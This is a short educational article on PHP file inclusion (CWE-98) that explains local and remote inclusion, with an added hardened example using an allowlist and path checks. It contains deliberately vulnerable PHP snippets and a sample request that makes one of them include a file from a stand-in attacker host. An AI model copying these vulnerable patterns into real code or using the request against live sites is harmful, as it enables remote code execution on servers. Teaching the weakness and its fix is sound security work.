PHP File Inclusion [CWE-98] — The Hacktivists

1. Description
………………………………

This weakness occurs when a PHP application receives input and uses it to include files via include(), require(), or similar functions. This results in the inclusion of attacker-controlled files, which might lead to information disclosure or execution of arbitrary code. There are two types of inclusion based on the location of the file to include. They are referred to as local and remote file inclusion.

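// Local file inclusion: the "filename" parameter goes into the include path unchecked
$filename = $_GET["filename"];
include($_SERVER["DOCUMENT_ROOT"] . "/" . $filename . ".php");

// Remote file inclusion: the "path" parameter supplies the start of the include path
$dir = $_GET["path"];
include($dir . "/file.inc");

// Request that makes the second snippet load its file from a remote host:
// vulnerable.php?path=http://attacker-site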
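
The hardened counterpart of the two snippets above, as an added example that is not part of the original article. The names PAGE_DIR, PAGES, resolve_page() and resolve_in_dir(), and the pages/ directory, are assumptions made for illustration.

```php
<?php
const PAGE_DIR = __DIR__ . '/pages';   // assumed directory holding includable files

// Option 1: allowlist. The request value is only a lookup key and is never
// concatenated into a path, so "../" sequences and URLs never reach include.
const PAGES = [                        // hypothetical page map
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

function resolve_page(string $key): ?string
{
    return array_key_exists($key, PAGES) ? PAGE_DIR . '/' . PAGES[$key] : null;
}

// Option 2: when the file set is not fixed, validate the name, canonicalise
// the path, and confirm it still lies inside the base directory.
function resolve_in_dir(string $name, string $baseDir): ?string
{
    // Plain names only: no slashes, dots, NUL bytes or URL schemes.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name . '.php');  // false if the file is absent
    if ($base === false || $path === false) {
        return null;
    }
    // realpath() resolves symlinks, so a link pointing outside $base fails here.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Replacement for the first vulnerable snippet: unknown keys yield a 404
// instead of an attacker-chosen include path.
$file = resolve_page($_GET['filename'] ?? 'home');
if ($file === null) {
    http_response_code(404);
    exit;
}
include $file;
```

Keeping the `allow_url_include` setting in php.ini disabled blocks the `http://` form of the second snippet, but it does nothing for local inclusion, so the path checks above are still required.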

2. Potential impact
………………………………

Successful exploitation of PHP file inclusion may result in information disclosure or compromise of the vulnerable system. A remote attacker can read and write files or execute arbitrary code on the target system with the privileges of the webserver.

3. Attack patterns
………………………………

In the CAPEC database, this weakness is treated as:

4. Affected software
………………………………

Web applications written in PHP are potentially vulnerable to this weakness.

5. Exploitation Examples
………………………………

Let’s have a look at the HTB23084 security advisory (CVE-2012-1933).

6. Severity and CVSS Scoring
……………………………………..

This weakness potentially allows unauthorized code execution on a remote system. It should be scored with maximum confidentiality, integrity, and availability ratings.
